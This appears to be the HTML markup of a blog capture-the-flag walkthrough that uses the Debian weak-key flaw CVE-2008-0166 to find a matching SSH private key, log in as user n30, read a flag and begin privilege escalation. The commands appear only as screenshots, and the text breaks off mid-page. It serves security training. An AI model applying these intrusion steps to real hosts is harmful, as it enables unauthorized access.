src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEggLJE5eSra8oBnqOw0KWXJ9vyNhqp99PPgJ-xJYvSLsvKosRWYOofY8ltxXCOLlPi4iSK5l-N9my-9SimdF09iS6oyTXrEqncnrLTU-DjFH0lBrqPl9ijpkSrU_GAeulY3-dcORmggfgXNO16PmbPEXk6G9aA4vbP5ipMJsiyIxMkfqjVf1tL9vnsg2w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- We are dealing with vulnerability&amp;nbsp;&lt;b&gt;CVE-2008-0166:&lt;/b&gt; &lt;i&gt;&quot;OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.&quot;&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0166&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0166&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Copying and reading &lt;b&gt;5622.tx&lt;/b&gt;&lt;b&gt;t&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiPrpU36xqWlTkJg8Fk6LiGqgkEM_QKIdZuKnKacd1exHzblUd-aBEYgm4vI_iyh3THCw5X0OMcOMldsgzUruNKFl9vEPAfVOTB8fQqvMPx8X4jzbpN0c-gT_JXhSkOsMTirTNrSYj_eWrBLgpVZ47X0LxGOW34ltJOMha3i-_B5iZY6uQ-bj4eTlVx4w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;149&quot; data-original-width=&quot;681&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiPrpU36xqWlTkJg8Fk6LiGqgkEM_QKIdZuKnKacd1exHzblUd-aBEYgm4vI_iyh3THCw5X0OMcOMldsgzUruNKFl9vEPAfVOTB8fQqvMPx8X4jzbpN0c-gT_JXhSkOsMTirTNrSYj_eWrBLgpVZ47X0LxGOW34ltJOMha3i-_B5iZY6uQ-bj4eTlVx4w=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEglMc1CsBUkbGknxdnCVNpkY0-1b4C3FFso-nkxq8zXy3B338Yfcn_wHcsT7taQFD2K_Jrtavpvm2AiprjH9QqwjKsSIlw-DvA3xjIIcrwIVkX42xERfvodJpEo6_XPEGPMfJ1eVb6pptPyffdIJDqg3ptVhQmfOWrdS5a5_g9xD1hYn0GP1U03YlvcJA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;647&quot; data-original-width=&quot;1193&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEglMc1CsBUkbGknxdnCVNpkY0-1b4C3FFso-nkxq8zXy3B338Yfcn_wHcsT7taQFD2K_Jrtavpvm2AiprjH9QqwjKsSIlw-DvA3xjIIcrwIVkX42xERfvodJpEo6_XPEGPMfJ1eVb6pptPyffdIJDqg3ptVhQmfOWrdS5a5_g9xD1hYn0GP1U03YlvcJA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Downloading and extracting &lt;b&gt;5622.tar.bz2&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiztJ3kOySDEOEzdc6z5tGYMjpWJ3bKahdryvWW4JzslnBNBCg0yUR0v57BaaIc1IHLe73xMiJdNu2qXkOl28e9ydkFk1pwlpHbBsw164yoLiAh4EdzifWphzzhEMQLZR24ytZpTufniAw-HM4ybptACfy9bVAJ6quiqw5HieiBjfLJXYQSE3JkBOe9pw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;522&quot; data-original-width=&quot;1166&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiztJ3kOySDEOEzdc6z5tGYMjpWJ3bKahdryvWW4JzslnBNBCg0yUR0v57BaaIc1IHLe73xMiJdNu2qXkOl28e9ydkFk1pwlpHbBsw164yoLiAh4EdzifWphzzhEMQLZR24ytZpTufniAw-HM4ybptACfy9bVAJ6quiqw5HieiBjfLJXYQSE3JkBOe9pw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgEYa-Yzqzts-9EUJqum9u8hW2wmWNq_5xqAqyi5wmNdC-y9COcFCuUp6FNeMJOIaxQa-Va-GQi2P5TgQd7fclT3Dxzj-rV5vqXkkuRND956eYcKu-2_12OwgTIZE-GRHSp7Kw2BPA0XLbRUEWQwPytgVcuV95hfWTvoNxHdBufdhPXUrDcpuYO-YkVFg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;53&quot; data-original-width=&quot;316&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgEYa-Yzqzts-9EUJqum9u8hW2wmWNq_5xqAqyi5wmNdC-y9COcFCuUp6FNeMJOIaxQa-Va-GQi2P5TgQd7fclT3Dxzj-rV5vqXkkuRND956eYcKu-2_12OwgTIZE-GRHSp7Kw2BPA0XLbRUEWQwPytgVcuV95hfWTvoNxHdBufdhPXUrDcpuYO-YkVFg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now we can look for the SSH private key by passing the encrypted key as parameter to &lt;b&gt;grep&lt;/b&gt;, finding it inside&amp;nbsp;&lt;b&gt;/rsa/2048&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgMUC6s4HHadF4ekbMAfnLrrC0DfOMmrW0_1L3F8J8espgmwxvqEdpWng-e9ylN7N6NVs2ik4hyr1dzjNGOdz9VlYyCIlxlxvB2k4LEd2U8wZCcrl0Zz2VsLWxZn923mXBSGCBxquedt8rFEmlIr3mkb0EPWifdggUYPg-aM8UrIeBdzKrkOVnnCl4CYg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;132&quot; data-original-width=&quot;685&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgMUC6s4HHadF4ekbMAfnLrrC0DfOMmrW0_1L3F8J8espgmwxvqEdpWng-e9ylN7N6NVs2ik4hyr1dzjNGOdz9VlYyCIlxlxvB2k4LEd2U8wZCcrl0Zz2VsLWxZn923mXBSGCBxquedt8rFEmlIr3mkb0EPWifdggUYPg-aM8UrIeBdzKrkOVnnCl4CYg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXRvR9BJPbOnDa8THBPiegWtwwCFy1ITExaRYOeu9Rtfv8gxtKmVB6DpOJdljKYvz6DmiJAidJQeY9yjho9G9kMPNuCrFpmzVFVyrwxio0AGpnZhTV4gB0rWesmMBlkBFgqrAOweqWc2evnGno8aBjDVYh6vD7BrAWxgSHHsUMCwds31CIYTZCwnAYeg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;83&quot; data-original-width=&quot;541&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXRvR9BJPbOnDa8THBPiegWtwwCFy1ITExaRYOeu9Rtfv8gxtKmVB6DpOJdljKYvz6DmiJAidJQeY9yjho9G9kMPNuCrFpmzVFVyrwxio0AGpnZhTV4gB0rWesmMBlkBFgqrAOweqWc2evnGno8aBjDVYh6vD7BrAWxgSHHsUMCwds31CIYTZCwnAYeg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- SSH-ing the target with the private key for user &lt;b&gt;n30&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi7vLQ7jCvXquMgniDM_pBAUurpa3EMWy7AjjkQTsH1oHoiD-YfyP0LrycKkr-QnYLbX8Mfo6MIpEfjyB0p6vrjeGyy6m0KMUhdnvn2j6ItXQwWWmbYXmxfV15XQvD8TtS9_NSpMieae4hVN9OqBjaWiiDlUoN2bG9px3U0-8S4C_-6zo2-2DHPxDUXOA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;264&quot; data-original-width=&quot;775&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi7vLQ7jCvXquMgniDM_pBAUurpa3EMWy7AjjkQTsH1oHoiD-YfyP0LrycKkr-QnYLbX8Mfo6MIpEfjyB0p6vrjeGyy6m0KMUhdnvn2j6ItXQwWWmbYXmxfV15XQvD8TtS9_NSpMieae4hVN9OqBjaWiiDlUoN2bG9px3U0-8S4C_-6zo2-2DHPxDUXOA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - READING 1st FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking inside &lt;b&gt;n30&lt;/b&gt;&#39;s home folder:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhawy4T-qoLyVc4ryHedZ564ZlwPXksrgiUn4Fygq8aqVRlfNIG9N2WDvcsQ64oUubyrn_f4Iqh31wJNSGeRBj0EKHC1iV2rirOUGfZVvXB_yUHCnUz1KPDe05jUIhvcULLKmE-fXVDOAUxPKrlvk3xNwQMYBy5haYWTSXAsGhdt3s8Shzh8t0wumxbyQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;322&quot; data-original-width=&quot;755&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhawy4T-qoLyVc4ryHedZ564ZlwPXksrgiUn4Fygq8aqVRlfNIG9N2WDvcsQ64oUubyrn_f4Iqh31wJNSGeRBj0EKHC1iV2rirOUGfZVvXB_yUHCnUz1KPDe05jUIhvcULLKmE-fXVDOAUxPKrlvk3xNwQMYBy5haYWTSXAsGhdt3s8Shzh8t0wumxbyQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;user.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjPJw8_sL7oHHxmezLFhI875QKF5vSd078r6b0-hC6X95HNRhanA9WsJXc-yL6yJ3RaajKqOXQX3xyqZ3vE5NzuKQGYTccu2adRIQ06gAkaulk1Jxd4yAsWiDUrkcG1nhICFbBIT0cyTVvFGTLk7bF6aoICtjQpiBXAyRCIBBKzgy9zid7cGuD9pKy-dg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;396&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjPJw8_sL7oHHxmezLFhI875QKF5vSd078r6b0-hC6X95HNRhanA9WsJXc-yL6yJ3RaajKqOXQX3xyqZ3vE5NzuKQGYTccu2adRIQ06gAkaulk1Jxd4yAsWiDUrkcG1nhICFbBIT0cyTVvFGTLk7bF6aoICtjQpiBXAyRCIBBKzgy9zid7cGuD9pKy-dg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Two interesting hints:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;a)&amp;nbsp;there is a file .&lt;b&gt;sudo_as_admin_successful&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp; b) &lt;b&gt;n30&lt;/b&gt; belongs to group &lt;b&gt;sudo&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;Unfortunately we cannot access to&amp;nbsp;&lt;b&gt;n30&lt;/b&gt;&#39;s sudoer privileges because we don&#39;t have the password:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg7pRxeFIPmw-DwAJU3uQbaOLCwP4rdmFfwHQQQAaLWcSAfIDt4AZozq8_k8BcNVDWAkZ2j0JBUSLfhCRRr9JAg7PHEPG_4QA4_FbLi_M43MSHkayLIBpsrO8PgpGVuWb4viIq_hCj0d_ntmznEIVfcjFc_tdaYosGVVpS18r7WbkSe26pEYaI3Yl8Gzg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;269&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg7pRxeFIPmw-DwAJU3uQbaOLCwP4rdmFfwHQQQAaLWcSAfIDt4AZozq8_k8BcNVDWAkZ2j0JBUSLfhCRRr9JAg7PHEPG_4QA4_FbLi_M43MSHkayLIBpsrO8PgpGVuWb4viIq_hCj0d_ntmznEIVfcjFc_tdaYosGVVpS18r7WbkSe26pEYaI3Yl8Gzg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Regarding the file &lt;b&gt;code&lt;/b&gt; we notice that it&#39;s &lt;b&gt;Python 2.7 byte-compiled&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjHvEJhkc3Qbc6dYzkZGYFlR8p95zNLvlQe_K67kOz7MCTtHQrovSyaSWuoyebD6H0H2RCS9pcLdl-vDR_j5aBv_Okblkt2N7aJHoSScmvan4kklsSxK24uFgzbsYnpae_qB6PX-cj6UzKDNpckaVgwE1trB8IGX5ANECmjhvXadHQZiIEk8Z8phmNeBw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;348&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjHvEJhkc3Qbc6dYzkZGYFlR8p95zNLvlQe_K67kOz7MCTtHQrovSyaSWuoyebD6H0H2RCS9pcLdl-vDR_j5aBv_Okblkt2N7aJHoSScmvan4kklsSxK24uFgzbsYnpae_qB6PX-cj6UzKDNpckaVgwE1trB8IGX5ANECmjhvXadHQZiIEk8Z8phmNeBw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Transferring &lt;b&gt;code&lt;/b&gt; to Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhuGXUCGqNJ26uPr4C01NMOVb_yUB25mk8e0_T6DWpKIIEb_rocGxXWjJ8MFzOg2PodfPHqLkto7Pj9w2aT1P6X9i3poimY0kSy6J4tqGDkbbeZqLAlXemawSsvjDiYVROr-YJsZNwzpzKzEh1WwroCXh7H1j1uFMKmgKPf9PkL8qChoUMR069oDsrawg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;486&quot; 